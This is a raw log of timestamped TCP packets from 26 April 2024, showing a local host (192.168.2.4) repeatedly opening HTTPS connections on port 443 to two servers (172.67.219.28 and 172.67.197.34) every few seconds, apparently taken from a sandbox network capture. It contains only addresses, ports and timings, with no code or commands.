Apr 26, 2024 23:21:43.671206951 CEST	49802	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:43.671262026 CEST	443	49802	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:43.671377897 CEST	49802	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:43.671555042 CEST	49802	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:43.671566963 CEST	443	49802	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:43.937736988 CEST	443	49802	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:43.941581964 CEST	49802	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:43.942663908 CEST	49802	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:43.942678928 CEST	443	49802	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:43.957520962 CEST	49802	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:43.957532883 CEST	443	49802	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:47.955348969 CEST	49802	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:48.011351109 CEST	49803	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:48.011390924 CEST	443	49803	172.67.197.34	192.168.2.4
Apr 26, 2024 23:21:48.011583090 CEST	49803	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:48.015436888 CEST	49803	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:48.015454054 CEST	443	49803	172.67.197.34	192.168.2.4
Apr 26, 2024 23:21:48.280092955 CEST	443	49803	172.67.197.34	192.168.2.4
Apr 26, 2024 23:21:48.283427000 CEST	49803	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:48.285054922 CEST	49803	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:48.285056114 CEST	49803	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:48.285099983 CEST	443	49803	172.67.197.34	192.168.2.4
Apr 26, 2024 23:21:48.285140991 CEST	443	49803	172.67.197.34	192.168.2.4
Apr 26, 2024 23:21:52.297827959 CEST	49803	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:52.301536083 CEST	49804	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:52.301623106 CEST	443	49804	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:52.306097984 CEST	49804	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:52.309364080 CEST	49804	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:52.309403896 CEST	443	49804	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:52.574677944 CEST	443	49804	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:52.579463005 CEST	49804	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:52.582235098 CEST	49804	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:52.582235098 CEST	49804	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:52.582263947 CEST	443	49804	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:52.582304955 CEST	443	49804	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:53.907275915 CEST	49804	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:53.910428047 CEST	49805	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:53.910461903 CEST	443	49805	172.67.197.34	192.168.2.4
Apr 26, 2024 23:21:53.910590887 CEST	49805	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:53.910739899 CEST	49805	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:53.910753012 CEST	443	49805	172.67.197.34	192.168.2.4
Apr 26, 2024 23:21:54.177380085 CEST	443	49805	172.67.197.34	192.168.2.4
Apr 26, 2024 23:21:54.177469969 CEST	49805	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:54.178040028 CEST	49805	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:54.178051949 CEST	443	49805	172.67.197.34	192.168.2.4
Apr 26, 2024 23:21:54.179187059 CEST	49805	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:54.179193020 CEST	443	49805	172.67.197.34	192.168.2.4
Apr 26, 2024 23:21:56.469794989 CEST	49805	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:56.473345041 CEST	49806	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:56.473371029 CEST	443	49806	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:56.473539114 CEST	49806	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:56.477444887 CEST	49806	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:56.477458954 CEST	443	49806	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:56.742415905 CEST	443	49806	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:56.742481947 CEST	49806	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:56.742932081 CEST	49806	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:56.742938042 CEST	443	49806	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:56.744395971 CEST	49806	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:56.744402885 CEST	443	49806	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:59.033675909 CEST	49806	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:59.037771940 CEST	49807	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:59.037811041 CEST	443	49807	172.67.197.34	192.168.2.4
Apr 26, 2024 23:21:59.037889004 CEST	49807	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:59.038091898 CEST	49807	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:59.038108110 CEST	443	49807	172.67.197.34	192.168.2.4
Apr 26, 2024 23:21:59.302232027 CEST	443	49807	172.67.197.34	192.168.2.4
Apr 26, 2024 23:21:59.302301884 CEST	49807	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:59.302766085 CEST	49807	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:59.302779913 CEST	443	49807	172.67.197.34	192.168.2.4
Apr 26, 2024 23:21:59.304524899 CEST	49807	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:59.304531097 CEST	443	49807	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:03.313543081 CEST	49807	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:03.317080975 CEST	49808	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:03.317130089 CEST	443	49808	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:03.317195892 CEST	49808	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:03.317405939 CEST	49808	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:03.317424059 CEST	443	49808	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:03.583911896 CEST	443	49808	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:03.584007025 CEST	49808	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:03.584467888 CEST	49808	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:03.584479094 CEST	443	49808	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:03.585824966 CEST	49808	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:03.585833073 CEST	443	49808	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:07.594768047 CEST	49808	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:07.598321915 CEST	49809	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:07.598364115 CEST	443	49809	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:07.598438978 CEST	49809	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:07.598630905 CEST	49809	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:07.598649025 CEST	443	49809	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:07.876131058 CEST	443	49809	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:07.876218081 CEST	49809	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:07.876643896 CEST	49809	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:07.876652002 CEST	443	49809	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:07.878205061 CEST	49809	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:07.878211975 CEST	443	49809	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:11.891840935 CEST	49809	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:11.894721031 CEST	49810	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:11.894748926 CEST	443	49810	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:11.894973040 CEST	49810	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:11.897624969 CEST	49810	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:11.897639036 CEST	443	49810	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:12.166562080 CEST	443	49810	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:12.169457912 CEST	49810	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:12.169805050 CEST	49810	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:12.169812918 CEST	443	49810	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:12.173533916 CEST	49810	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:12.173538923 CEST	443	49810	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:16.157646894 CEST	49810	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:16.189186096 CEST	49811	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:16.189230919 CEST	443	49811	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:16.189364910 CEST	49811	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:16.189655066 CEST	49811	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:16.189671040 CEST	443	49811	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:16.458548069 CEST	443	49811	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:16.458631039 CEST	49811	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:16.460243940 CEST	49811	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:16.460243940 CEST	49811	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:16.460254908 CEST	443	49811	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:16.460277081 CEST	443	49811	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:20.471385956 CEST	49811	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:20.472531080 CEST	49812	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:20.472604990 CEST	443	49812	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:20.472788095 CEST	49812	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:20.475392103 CEST	49812	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:20.475428104 CEST	443	49812	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:20.735974073 CEST	443	49812	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:20.739495993 CEST	49812	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:20.741014957 CEST	49812	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:20.741014957 CEST	49812	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:20.741064072 CEST	443	49812	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:20.741122961 CEST	443	49812	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:24.753381968 CEST	49812	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:24.754602909 CEST	49813	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:24.754690886 CEST	443	49813	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:24.754822016 CEST	49813	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:24.757622004 CEST	49813	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:24.757659912 CEST	443	49813	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:25.021131039 CEST	443	49813	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:25.021209955 CEST	49813	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:25.021646023 CEST	49813	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:25.021665096 CEST	443	49813	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:25.023663044 CEST	49813	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:25.023675919 CEST	443	49813	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:29.032604933 CEST	49813	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:29.045944929 CEST	49814	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:29.045986891 CEST	443	49814	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:29.046061039 CEST	49814	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:29.046324968 CEST	49814	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:29.046341896 CEST	443	49814	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:29.309015989 CEST	443	49814	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:29.309077978 CEST	49814	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:29.309555054 CEST	49814	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:29.309566975 CEST	443	49814	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:29.311045885 CEST	49814	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:29.311058998 CEST	443	49814	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:33.319396973 CEST	49815	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:33.319396973 CEST	49814	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:33.319453001 CEST	443	49815	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:33.319524050 CEST	49815	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:33.319808006 CEST	49815	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:33.319822073 CEST	443	49815	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:33.579505920 CEST	443	49815	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:33.579571962 CEST	49815	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:33.580029964 CEST	49815	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:33.580040932 CEST	443	49815	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:33.581449032 CEST	49815	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:33.581454039 CEST	443	49815	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:37.595242023 CEST	49815	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:37.604110956 CEST	49816	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:37.604146957 CEST	443	49816	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:37.604209900 CEST	49816	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:37.604453087 CEST	49816	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:37.604465961 CEST	443	49816	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:37.867506027 CEST	443	49816	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:37.869518042 CEST	49816	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:37.871155977 CEST	49816	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:37.871155977 CEST	49816	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:37.871170044 CEST	443	49816	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:37.871185064 CEST	443	49816	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:41.879400969 CEST	49816	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:41.879971027 CEST	49817	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:41.880021095 CEST	443	49817	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:41.880131960 CEST	49817	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:41.880383015 CEST	49817	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:41.880398989 CEST	443	49817	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:42.142193079 CEST	443	49817	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:42.142422915 CEST	49817	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:42.143414974 CEST	49817	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:42.143421888 CEST	443	49817	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:42.144390106 CEST	49817	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:42.144396067 CEST	443	49817	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:46.157706022 CEST	49817	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:46.160554886 CEST	49818	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:46.160588026 CEST	443	49818	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:46.160883904 CEST	49818	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:46.161081076 CEST	49818	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:46.161092997 CEST	443	49818	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:46.421601057 CEST	443	49818	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:46.421695948 CEST	49818	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:46.423381090 CEST	49818	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:46.423381090 CEST	49818	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:46.423388958 CEST	443	49818	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:46.423403025 CEST	443	49818	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:50.154717922 CEST	443	49818	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:50.154906988 CEST	49818	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:50.154927015 CEST	443	49818	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:50.155026913 CEST	443	49818	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:50.155172110 CEST	49818	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:50.155198097 CEST	49818	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:50.155198097 CEST	49818	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:50.155220032 CEST	443	49818	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:50.158828020 CEST	49818	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:50.231406927 CEST	49819	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:50.231442928 CEST	443	49819	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:50.231694937 CEST	49819	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:50.231914997 CEST	49819	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:50.231929064 CEST	443	49819	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:50.499114037 CEST	443	49819	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:50.499232054 CEST	49819	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:50.499866009 CEST	49819	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:50.499878883 CEST	443	49819	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:50.501315117 CEST	49819	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:50.501326084 CEST	443	49819	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:54.013902903 CEST	443	49819	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:54.014214993 CEST	443	49819	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:54.014364004 CEST	49819	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:54.015086889 CEST	49819	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:54.015109062 CEST	443	49819	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:54.135483027 CEST	49820	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:54.135541916 CEST	443	49820	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:54.138557911 CEST	49820	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:54.141411066 CEST	49820	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:54.141433954 CEST	443	49820	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:54.408493996 CEST	443	49820	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:54.411520958 CEST	49820	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:54.411915064 CEST	49820	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:54.411946058 CEST	443	49820	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:54.413203955 CEST	49820	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:54.413225889 CEST	443	49820	172.67.219.28	192.168.2.4
Apr 26, 2024 23:22:58.409401894 CEST	49820	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:22:58.411046028 CEST	49821	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:58.411154985 CEST	443	49821	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:58.411256075 CEST	49821	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:58.411540985 CEST	49821	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:58.411572933 CEST	443	49821	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:58.677162886 CEST	443	49821	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:58.677331924 CEST	49821	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:58.677782059 CEST	49821	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:58.677804947 CEST	443	49821	172.67.197.34	192.168.2.4
Apr 26, 2024 23:22:58.679406881 CEST	49821	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:22:58.679424047 CEST	443	49821	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:02.688783884 CEST	49821	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:02.691843033 CEST	49822	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:02.691883087 CEST	443	49822	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:02.692063093 CEST	49822	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:02.695404053 CEST	49822	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:02.695420027 CEST	443	49822	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:02.965490103 CEST	443	49822	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:02.965572119 CEST	49822	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:02.966187954 CEST	49822	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:02.966202021 CEST	443	49822	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:02.968053102 CEST	49822	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:02.968059063 CEST	443	49822	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:06.970776081 CEST	49822	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:06.974414110 CEST	49823	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:06.974442005 CEST	443	49823	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:06.974499941 CEST	49823	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:06.974761963 CEST	49823	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:06.974773884 CEST	443	49823	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:07.238622904 CEST	443	49823	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:07.238794088 CEST	49823	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:07.239314079 CEST	49823	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:07.239320993 CEST	443	49823	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:07.240879059 CEST	49823	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:07.240883112 CEST	443	49823	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:11.251924038 CEST	49823	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:11.256201982 CEST	49824	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:11.256239891 CEST	443	49824	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:11.256298065 CEST	49824	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:11.256534100 CEST	49824	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:11.256550074 CEST	443	49824	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:11.522655010 CEST	443	49824	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:11.522723913 CEST	49824	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:11.523155928 CEST	49824	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:11.523164988 CEST	443	49824	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:11.524804115 CEST	49824	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:11.524808884 CEST	443	49824	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:15.529081106 CEST	443	49824	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:15.529154062 CEST	49824	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:15.529170036 CEST	443	49824	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:15.529218912 CEST	49824	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:15.529239893 CEST	443	49824	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:15.529282093 CEST	49824	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:15.529288054 CEST	443	49824	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:15.529334068 CEST	49824	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:15.529356003 CEST	443	49824	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:15.529409885 CEST	49824	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:15.529719114 CEST	49824	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:15.529735088 CEST	443	49824	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:15.639935970 CEST	49825	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:15.639976978 CEST	443	49825	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:15.640094042 CEST	49825	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:15.640393019 CEST	49825	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:15.640414000 CEST	443	49825	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:15.908294916 CEST	443	49825	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:15.909527063 CEST	49825	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:15.911762953 CEST	49825	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:15.911762953 CEST	49825	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:15.911776066 CEST	443	49825	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:15.911796093 CEST	443	49825	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:19.908078909 CEST	49825	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:20.031445980 CEST	49826	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:20.031474113 CEST	443	49826	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:20.034629107 CEST	49826	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:20.037493944 CEST	49826	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:20.037502050 CEST	443	49826	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:20.298819065 CEST	443	49826	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:20.298971891 CEST	49826	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:20.299422979 CEST	49826	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:20.299429893 CEST	443	49826	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:20.301476002 CEST	49826	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:20.301511049 CEST	443	49826	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:24.315555096 CEST	49826	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:24.319432974 CEST	49827	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:24.319477081 CEST	443	49827	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:24.319633961 CEST	49827	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:24.319818020 CEST	49827	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:24.319832087 CEST	443	49827	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:24.584815025 CEST	443	49827	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:24.584923983 CEST	49827	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:24.585407972 CEST	49827	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:24.585417986 CEST	443	49827	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:24.587004900 CEST	49827	443	192.168.2.4	172.67.219.28
